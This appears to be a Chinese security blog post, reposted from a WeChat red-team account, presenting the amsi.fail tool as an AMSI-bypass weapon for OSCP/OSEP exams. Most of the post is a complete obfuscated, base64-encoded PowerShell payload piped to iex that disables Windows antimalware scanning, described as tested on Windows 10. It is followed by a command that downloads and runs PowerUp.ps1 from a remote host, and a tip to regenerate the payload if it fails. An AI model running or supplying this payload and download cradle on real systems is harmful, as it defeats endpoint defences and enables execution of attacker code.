0-简介
【OSCP必备】【OSEP必备】【实战必备】
amsi.fail是一款AMSI bypass神器
1-名称
https://amsi.fail/
2-来源
https://github.com/Flangvik/AMSI.fail
3-用法
打开https://amsi.fail/,点击“Generate Encoded”生成加密的powershell脚本,在目标机器上运行即可bypass AMSI。下面是一个例子,windows10下亲测可用:
[sySTem.tEXT.enCodinG]::UniCodE.gEtSTriNg([SySTEM.COnVeRT]::FROmBASe64StrING("IwBNAGEAdAB0ACA
ARwByAGEAZQBiAGUAcgBzACAAcwBlAGMAbwBuAGQAIABSAGUAZgBsAGUAYwB0AGkAbwBuACAAbQBlAHQAaABvAGQAIAAKACQAcwBiAE0AVQBGAF8AcAB0ADY
AYQBoAHoAZABQAHAAMQBsAEUAQQA9ACQAbgB1AGwAbAA7ACQAXwBPAF8AegA5ADIAbQBhAHEARABBAFYAVwA2AE4AdwA9ACIAUwB5AHMAdABlAG0ALgAkACg
AKAAnAE0A4ABuAOEAZwDqACcAKwAnAG0A6QBuAHQAJwApAC4AbgBvAHIATQBBAEwAaQBaAGUAKABbAEMASABBAHIAXQAoAFsAQgBZAHQARQBdADAAeAA0ADY
AKQArAFsAQwBoAEEAUgBdACgAMQAxADEAKgA1ADUALwA1ADUAKQArAFsAYwBIAEEAUgBdACgAMQAxADQAKwA2ADAALQA2ADAAKQArAFsAQwBIAEEAcgBdACg
AOQAzACsAMQA2ACkAKwBbAGMAaABhAHIAXQAoADYAOAApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAEMAaABhAHIAXQAoAFsAQgB5AHQARQBdADAAeAA1AGM
AKQArAFsAQwBIAGEAUgBdACgAMQAxADIAKQArAFsAQwBIAGEAUgBdACgAMQAyADMAKQArAFsAQwBIAEEAUgBdACgAMQAxACsANgA2ACkAKwBbAEMAaABBAHI
AXQAoADEAMQAwACkAKwBbAEMAaABBAFIAXQAoAFsAYgBZAFQARQBdADAAeAA3AGQAKQApAC4AJAAoACgAJwDAAPsAdAD1ACcAKwAnAG0A4gB0AO0AJwArACc
A9ABuACcAKQAuAG4AbwByAE0AYQBsAEkAWgBlACgAWwBDAGgAQQByAF0AKABbAGIAWQB0AGUAXQAwAHgANAA2ACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQ
ARQBdADAAeAA2AGYAKQArAFsAQwBIAEEAUgBdACgAWwBCAFkAdABlAF0AMAB4ADcAMgApACsAWwBDAGgAYQByAF0AKAA0ADYAKwA2ADMAKQArAFsAYwBoAEE
AcgBdACgANgA4ACoAMQA0AC8AMQA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAGEAcgBdACgAWwBCAFkAVABFAF0AMAB4ADUAYwApACsAWwBjAEg
AQQByAF0AKABbAEIAeQB0AEUAXQAwAHgANwAwACkAKwBbAGMASABBAFIAXQAoAFsAQgB5AFQARQBdADAAeAA3AGIAKQArAFsAQwBoAGEAcgBdACgAWwBCAFk
AdABlAF0AMAB4ADQAZAApACsAWwBDAEgAQQBSAF0AKAA1ACsAMQAwADUAKQArAFsAYwBIAGEAcgBdACgAWwBCAHkAdABFAF0AMAB4ADcAZAApACkALgAkACg
AWwBDAGgAYQBSAF0AKAAxADAAKwA1ADUAKQArAFsAQwBIAEEAUgBdACgAMQAwADkAKwA4ADkALQA4ADkAKQArAFsAYwBIAEEAUgBdACgAWwBiAFkAdABFAF0
AMAB4ADcAMwApACsAWwBDAEgAQQByAF0AKABbAEIAWQB0AEUAXQAwAHgANgA5ACkAKwBbAEMASABBAHIAXQAoAFsAYgBZAFQAZQBdADAAeAA1ADUAKQArAFs
AYwBIAEEAUgBdACgANAA0ACsANwAyACkAKwBbAGMAaABBAHIAXQAoAFsAYgB5AFQARQBdADAAeAA2ADkAKQArAFsAQwBoAEEAcgBdACgAWwBCAHkAVABFAF0
AMAB4ADYAYwApACsAWwBDAEgAYQBSAF0AKAA2ADkAKwA0ADYAKQApACIAOwAkAHIAdgBwAHQAegBqAGQAdwB2AG4AeAB1AHQAagBxAHkAbwBiAGYAcAB2AD0
AIgArACgAJwDpACcAKwAnAOwAJwArACcAYgAnACkALgBuAE8AUgBtAEEAbABJAHoAZQAoAFsAYwBoAEEAUgBdACgANwAwACoANQA4AC8ANQA4ACkAKwBbAEM
ASABBAHIAXQAoADQAOQArADYAMgApACsAWwBDAGgAQQByAF0AKAA3ADQAKwA0ADAAKQArAFsAQwBoAEEAcgBdACgAWwBiAHkAdABlAF0AMAB4ADYAZAApACs
AWwBjAEgAQQByAF0AKAA2ADgAKwA5AC0AOQApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAEMASABBAHIAXQAoADMANgArADUANgApACsAWwBDAEgAYQBSAF0
AKABbAGIAWQB0AGUAXQAwAHgANwAwACkAKwBbAGMASABBAHIAXQAoAFsAQgB5AFQAZQBdADAAeAA3AGIAKQArAFsAQwBoAEEAUgBdACgANwA3ACsAMwAxAC0
AMwAxACkAKwBbAEMASABhAFIAXQAoADEAMQAwACsANQA0AC0ANQA0ACkAKwBbAGMASABhAHIAXQAoADEAMgA1ACsANAAwAC0ANAAwACkAIgA7AFsAVABoAHI
AZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBTAGwAZQBlAHAAKAAxADQANwA2ACkAOwBbAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFM
AZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAKAAiACQAKAAoACcAVwByAO4AdAAnACsAJwDqAM0AbgB0ACcAKwAnADMAMgAnACkALgBOAG8
AcgBNAEEAbABpAFoAZQAoAFsAQwBIAGEAcgBdACgANwAwACkAKwBbAGMASABBAFIAXQAoADEAMQAxACkAKwBbAEMAaABhAFIAXQAoAFsAQgBZAFQAZQBdADA
AeAA3ADIAKQArAFsAQwBIAEEAcgBdACgAWwBiAHkAdABFAF0AMAB4ADYAZAApACsAWwBjAGgAYQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANAA0ACkAKQAgAC0
AcgBlAHAAbABhAGMAZQAgAFsAYwBIAEEAcgBdACgANAA0ACsANAA4ACkAKwBbAEMASABhAHIAXQAoADEAMQAyACsAMwAwAC0AMwAwACkAKwBbAEMAaABhAHI
AXQAoADEAMgAzACoANQA4AC8ANQA4ACkAKwBbAGMASABBAHIAXQAoADUANQArADIAMgApACsAWwBjAGgAQQByAF0AKABbAEIAeQB0AEUAXQAwAHgANgBlACk
AKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3AGQAKQApACIAKQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGU
AKAAkAF8ATwBfAHoAOQAyAG0AYQBxAEQAQQBWAFcANgBOAHcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBIAEEAUgBdACgAWwBiAHkAdABFAF0
AMAB4ADYAMQApACsAWwBjAGgAYQByAF0AKAAxADAAOQArADcANwAtADcANwApACsAWwBDAGgAYQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANwAzACkAKwBbAEM
ASABhAHIAXQAoADEAMAA1ACkAKwBbAGMASABhAHIAXQAoAFsAYgB5AHQARQBdADAAeAA0ADMAKQArAFsAQwBIAGEAcgBdACgAMQAxADEAKQArAFsAYwBIAEE
AcgBdACgAWwBiAFkAVABlAF0AMAB4ADYAZQApACsAWwBjAGgAQQByAF0AKAAxADEANgArADIANwAtADIANwApACsAWwBDAEgAQQByAF0AKAAxADAAMQArADQ
AOAAtADQAOAApACsAWwBDAEgAYQBSAF0AKAAxADIAMAArADMANwAtADMANwApACsAWwBjAEgAQQByAF0AKABbAGIAWQB0AEUAXQAwAHgANwA0ACkAKQAiACw
AWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4
ARwBlAHQAVgBhAGwAdQBlACgAJABzAGIATQBVAEYAXwBwAHQANgBhAGgAegBkAFAAcAAxAGwARQBBACkALAAwAHgAMgBjADUAYQAzADAAZAA0ACkAOwAkAGg
AYgBuAHEAcgBuAGMAYwBrAGIAYQB1AGQAYQB6AHgAYgBsAGIAdgBoAG0AYgBkAGcAZwBvAG0APQAiACsAKAAnAHMAbgBzACcAKwAnAHgAcgB5ACcAKQAuAG4
ATwByAG0AQQBMAEkAWgBFACgAWwBjAGgAYQByAF0AKABbAEIAWQBUAEUAXQAwAHgANAA2ACkAKwBbAGMASABBAHIAXQAoADEAMQAxACoAMgAxAC8AMgAxACk
AKwBbAGMAaABhAFIAXQAoAFsAQgBZAHQARQBdADAAeAA3ADIAKQArAFsAQwBIAEEAcgBdACgAWwBiAHkAVABlAF0AMAB4ADYAZAApACsAWwBDAEgAYQBSAF0
AKABbAGIAWQB0AEUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAEEAUgBdACgAWwBCAHkAdABFAF0AMAB4ADUAYwApACsAWwBDAEg
AQQByAF0AKAAzADUAKwA3ADcAKQArAFsAYwBIAEEAcgBdACgAMQAxADAAKwAxADMAKQArAFsAYwBIAGEAUgBdACgANgArADcAMQApACsAWwBjAEgAYQBSAF0
AKABbAGIAWQB0AGUAXQAwAHgANgBlACkAKwBbAGMAaABBAFIAXQAoAFsAYgBZAHQAZQBdADAAeAA3AGQAKQAiADsAWwBUAGgAcgBlAGEAZABpAG4AZwAuAFQ
AaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADEANgA5ADQAKQA="))|iex
后面再执行就可以bypass AMSI了
iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))
Invoke-AllChecks
4-实际案例
加载PowerUp被禁止:
iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))
生成bypass AMSI命令并执行:
https://amsi.fail/
执行成果,完美bypass AMSI
考试技巧:
https://amsi.fail/中的代码不一定每次都可以成功bypass,如果不成功再生成一个再执行即可
原文始发于微信公众号(高级红队专家):黑客武器库 | AMSI.fail完美bypass AMSI
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论